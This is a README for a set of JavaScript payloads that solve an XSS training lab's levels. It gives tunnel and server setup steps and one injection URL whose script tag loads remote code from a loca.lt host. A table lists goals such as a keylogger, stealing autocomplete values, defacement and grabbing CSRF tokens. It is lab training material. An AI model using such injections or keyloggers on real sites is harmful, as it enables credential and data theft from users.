These are javascript payloads to solve the challenges on http://pentesteracademylab.appspot.com/lab/webapp/jfp/{LEVEL_NAME}.
The goal is to use an XSS to modify the site, from simple redirection to keyloggers. The payloads for level 1-6 are inspired by this blog:
- Part1: https://sp1icer.dev/writeups/javascript-for-pentesters-intro/
- Part2: https://sp1icer.dev/writeups/javascript-for-pentesters-pt-2/
The simplest way to debug is to use the Console
in the browser and just paste the code inside:
npm install -g localtunnel
- Start a python server on current folder
./server.sh
- The payload can now be deployed by visiting the link in the browser
http://pentesteracademylab.appspot.com/lab/webapp/jfp/1?url=<script src=https://free-wombats-like.loca.lt/01.js></script>
Number | Description |
---|---|
1 | Modify elements |
2 | Loop |
3 | Modify form field target url |
4 | Add new field to form |
5 | Delete Elements |
6 | Capture Mouse clicks |
7 | Keylogger |
8 | XSS in |
9 | Load second js |
10 | Same as 9 |
11 | Defacement image |
12 | Steal autocomplete values |
13 | 12 but with XMLHttpRequest |
14 | XMLHttpRequest callback |
15 | XMLHttpRequest POST with callback |
16 | No solution Where to get session? |
17 | Dynamically grab csfr token |
18 | Evaluate HTML on other site |
19 | Get multiple CSRF tokens |
20 | Beautiful callback code |
21 | Pars XML-document |